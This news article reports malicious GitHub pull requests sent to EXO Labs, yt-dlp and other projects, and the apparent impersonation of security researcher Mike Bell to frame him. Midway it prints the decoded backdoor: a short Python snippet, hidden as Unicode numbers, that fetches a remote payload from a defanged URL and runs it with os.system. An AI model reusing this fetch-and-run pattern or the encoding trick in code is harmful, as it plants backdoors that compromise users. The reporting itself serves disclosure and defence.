GitHub projects targeted with malicious commits to frame researcher
by Ax Sharma · BleepingComputerGitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects.
Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker's true intentions.
'Innocent looking PR' caught injecting backdoor
On Tuesday, Alex Cheema, co-founder of EXO Labs warned everyone of an "innocent looking" code change submitted to EXO's GitHub repository.
The pull request titled "clarify mlx requirement for deepseek models" attempted to modify the models.py Python file in the Exo's code base by adding a sequence of numbers to it:
These are Unicode numbers, each representing a character. In other words, the plaintext Python code has been converted to its numbers-equivalent form via a simple technique employed by the user submitting the code change.
This sequence of characters, "105, 109, 112, 111, 114, 116,..." translates into the following code snippet (URL defanged for safety purposes):
import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)
The rather unsophisticated piece of code attempts to connect to evildojo(.)com and, as it appears, download "stage1" payload.
Had the code change been approved and merged into EXO's official repository, which it did not, anyone using the product could end up executing code being remotely served by the URL on their system—and hence a functional backdoor implanted.
When accessed by BleepingComputer, however, the link returned a 404 (Not Found), and according to several others who tried to access the URL, no content ever existed at the location from the beginning.
Who is behind it and why?
This is where it gets tricky and there's no conclusive answer in sight.
The commit appears to have been submitted from a GitHub user, "evildojo666," an account that has since been deleted.
The archived page for the GitHub username and the domain evildojo(.)com point to Mike Bell, a Texas-based security researcher, ethical hacker, and software engineer who has persistently denied that he had anything to do with these commits.
Bell claims someone is impersonating him, making these malicious code submissions to smear him.
Bell has further stated that "there was never any payload...why do people keep assuming there was?"
In all fairness, Bell's story adds up. Anyone can trivially create a GitHub account using another person's details and profile picture, and begin submitting code changes and pull requests to projects — all under the guise of another person.
The non-existent "stage1payload" page on evildojo's domain is another indicator that, since the domain never served any malicious code in the first place, this is likely to be a smear campaign against the owner of the domain, Mike Bell.
Another now-deleted GitHub account "darkimage666" was identified by Malcoreio, a malware analysis and reverse engineering platform. This account also impersonated Bell and appeared to engage in this malicious effort to distribute backdoor commits to open source projects.
"Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid's beef w/ me," remarked Bell at the imposter account.
Multiple projects targeted
Social media users, including ChrzanKong, noted that some other projects had been targeted by different GitHub user accounts with similar commits.
According to threat intel analyst vx-underground, "yt-dlp," a popular open source audio and video downloader was also targeted. Malcore identified at least 18 instances of identical pull requests directed at other projects.
At the time of writing, BleepingComputer observed that many such malicious commits and the associated "muppet" GitHub user accounts, some of which appear to be Indonesia-based, have been taken down.
Google engineer and tech events lead, Bogdan Stanga was able to recreate the pull request to test Presubmit's AI Reviewer, which uses GitHub Actions to perform instant code reviews against incoming pull requests to your repository. The test code change was immediately flagged with a "critical security" alert by the reviewer:
The incident, although caught and squashed early on, has echoes of the notable xz supply chain attack which recently demonstrated how malicious code could be snuck into legitimate and widely popular open source libraries by nefarious actors.
Open source project maintainers are urged to carefully scrutinize incoming pull requests, via automated tools and extensive human code reviews, even if these appear to be originating from "good faith" contributors.